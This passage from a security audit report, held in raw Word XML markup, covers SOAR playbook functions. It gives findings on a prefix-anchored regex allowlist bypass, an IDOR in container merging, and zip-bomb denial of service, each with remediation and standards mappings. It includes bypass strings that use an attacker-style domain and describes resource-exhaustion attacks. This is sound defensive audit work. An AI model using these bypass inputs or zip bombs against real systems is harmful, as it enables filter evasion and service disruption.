        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-295 Improper Certificate Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A07:2021 Identification and Authentication Failures, A02:2021 Cryptographic Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1557 Adversary-in-the-Middle. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-8 Transmission Confidentiality and Integrity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Communication Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-06 — regex_filter_list uses prefix-anchored re.match for keep/drop filtering (allow-list bypass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.4). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/regex_filter_list.py:28-35</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for item in input_list:</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if item:</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if re.match(str(regex), str(item)):   # anchors at start only, not full string</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if action == 'keep': outputs.append({"item": item})</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else:</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if action == 'drop': outputs.append({"item": item})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>re.match</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> anchors only at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the string and does not require the pattern to consume the whole value (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fullmatch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). When this function implements a security allow/deny filter over indicators, an attacker can append arbitrary suffixes to slip a malicious value past a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>keep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allowlist or make it evade a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> denylist. E.g. a "keep only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" rule keeps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>malware.exe.ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; a "keep only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>corp.example.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URLs" rule keeps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>corp.example.com.attacker.io</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CEF indicator value → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, playbook regex → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wherever the result drives a block/allow decision. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I regex_user.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>regex='\w+\.exe'                 item='malware.exe.ransomware'              match=True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>regex='https?://corp\.example\.com' item='https://corp.example.com.attacker.io/' match=True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>re.search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for "contains", or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>re.fullmatch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for "the whole value must match", and document which semantics the keep/drop filter guarantees. For allowlisting, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fullmatch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is correct:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>compiled = re.compile(regex)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>matched = bool(compiled.fullmatch(str(item)))   # whole-string match</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This removes the trailing-suffix bypass without changing behaviour for already-correct patterns that match whole values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-625; CWE-692; CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection, A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1027 Obfuscated Files or Information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-09 — container_merge: unauthorised close/merge/evidence on attacker-influenced container IDs (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.4). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/container_merge.py:108-167</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is numeric-validated but never authorization-checked. Any container ID reachable by the automation user is copied into the target case, marked as evidence, annotated, and optionally </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>closed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If an attacker can influence the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> input (e.g. a CEF field that a playbook feeds in), they can merge unrelated incidents, pollute a case with chosen artifacts, or close/hide active incidents (evidence tampering / incident disruption). Notes are built with container-supplied names into markdown (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[{name}]({base}/mission/{id})</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), a stored-content concern. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CEF-derived IDs → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (requires the playbook to map attacker data into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; IDs must be valid/reachable). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: not executed against a live SOAR (would require the REST backend); the code path performs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set_status(container=child_container_id, status="closed")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and evidence POST for every supplied ID with no ownership/relationship check. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: before acting, fetch each child container and verify it is in scope (same label/owner/tenant or an explicit allowlisted relationship), and require an explicit opt-in flag for the destructive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> step; markdown-escape container names in notes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-639 Authorization Bypass Through User-Controlled Key (IDOR); CWE-862 Missing Authorization (2024 CWE Top 25 #9). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1565.001 Data Manipulation: Stored Data Manipulation, T1070 Indicator Removal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.3 Information access restriction. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-04 — zip_extract: uncapped decompression (zip-bomb DoS) and no temp cleanup; Zip-Slip not exploitable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Exploitable for DoS (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/zip_extract.py:47-64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>extract_path = Path("/opt/phantom/vault/tmp/") / vault_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>extract_path.mkdir(parents=True, exist_ok=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with zipfile.ZipFile(info[0]["path"]) as f_zip:</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if password:</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f_zip.extractall(str(extract_path), pwd=password.encode())</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else:</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f_zip.extractall(str(extract_path))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for p in extract_path.rglob("*"):</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if p.is_file():</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phantom.vault_add(...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The zip is an attacker-supplied email attachment pulled from the vault. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>extractall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is called with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no limit on uncompressed size, compression ratio, or member count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the extracted files are then copied into the SOAR vault. A zip bomb exhausts the shared </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/opt/phantom/vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> volume (and the vault DB), degrading the whole SOAR node. The temp dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/opt/phantom/vault/tmp/&lt;vault_id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>never cleaned up</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so disk usage grows unbounded across runs. The docstring claims recursive extraction of nested archives, but the code does not re-extract nested zips (functional gap, not a vuln). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Calibrated note on Zip-Slip:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/absolute-path/symlink traversal that this pattern is classically vulnerable to is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>neutralized by CPython's `zipfile`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the declared Python 3.13 runtime — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>extractall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sanitizes member paths and writes symlink entries as regular files. My PoC proves no file escaped the target directory. So path traversal here is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the real issue is resource exhaustion + cleanup. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: phishing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in vault (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*.cef.vaultId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>extractall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for DoS (no preconditions beyond the playbook running zip_extract on an attacker attachment, which is its purpose). Path traversal: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (run in scratch dir; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>zip_extract.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> copied with only the hardcoded base path redirected into a sandbox):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Traversal attempt — all members flattened INSIDE the target, none escaped:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
